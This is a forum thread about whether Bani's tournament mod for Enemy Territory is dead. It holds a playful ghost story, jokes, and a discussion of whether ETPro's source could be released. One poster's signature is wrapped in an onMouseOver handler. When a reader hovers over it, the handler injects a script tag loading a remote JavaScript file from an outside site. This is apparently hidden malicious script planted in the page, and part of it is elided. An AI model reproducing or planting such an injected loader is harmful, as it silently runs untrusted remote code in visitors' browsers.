Is this mod really dead?

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

EvilJohn

Post by EvilJohn »

I hear this strange talk of mods of Bani being dead. Just a few Friday nights ago. I tried to join Av bani server, rumor was on Friday nights its Bani night.
But lass, I could not. Server was full. It was full of etpro players. Mere children. They have no understanding about soldiers flying. To them goldrush is some kind of bank heist map. Talk of a spy, huh? What are you smoking?

I finally get in the server past midnite. But it was empty. A dark map started, it was set on a beach with barbed wire, a high fortress base ahead of me.. Suddenly a woosh sound. A soldier in the air, heavy smoke trailing. What is this, only I on the server. What is this ghost from the past. I look up at his weapon. Its a one shot instagib rifle. I look back down. The map has changed. Trenches every where. I hear old men say some thing about buzzards, and cows. Gold bricks lay about. They shout feed the cow. Bring it to the cow. I am frighted my these men laughing and having fun on such a strange map with only a rifle, and these silly gold bars falling sometimes from the sky. I quickly exit the server.

In the morning the data center calls. They tell me they are sorry the dedicated box went down at midnite. But service is restored. I let then know it was up after midnite. Impossible is the response.

You see for those who believe. Mods of bani will never die. But live on. Live on even more as game makers take from mods of Bani
For those who don't believe. Join the server and see for your self.
First is the innovator, then comes the imitators. Lastly the idiots.
Rain

Post by Rain »

I'm not dead!
I'm not!
I'm getting better!
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Igloo

Post by Igloo »

http://splashdamage.com/forums/showpost ... stcount=17
should be fixed in the next etpro (really this time!)
What time? :D :D

Greetings,
Igloo
gotenks

Post by gotenks »

12th September 2007
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
Igloo

Post by Igloo »

gotenks wrote:
12th September 2007
Oh really?
Luk4ward

Post by Luk4ward »

quad on 29/04/08, 07:55:16 wrote: We can't use etpro because it's source code is not available. Etpro team wrote the mod with various licensing terms, contracts and non-disclosure agreements in effect, so it would be against the law to release the code without written permission from every coder that ever wrote anything for etpro, and moreover, also from ID (because they had access to the engine code while writing bits of it).
true or not?

source (topic @ crossfire about ETACE)
wolFTeam.pl
gotenks

Post by gotenks »

bani could always exclude code that was written by a source not willing to be released... in some cases this would be fairly difficult and others it could be just excluding several lines of code... HOWEVER i do not think bani wants fake etpro's running around so without an NDA i seriously doubt he'd release it... imho, note he's never released banimod, and he wrote that himself
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?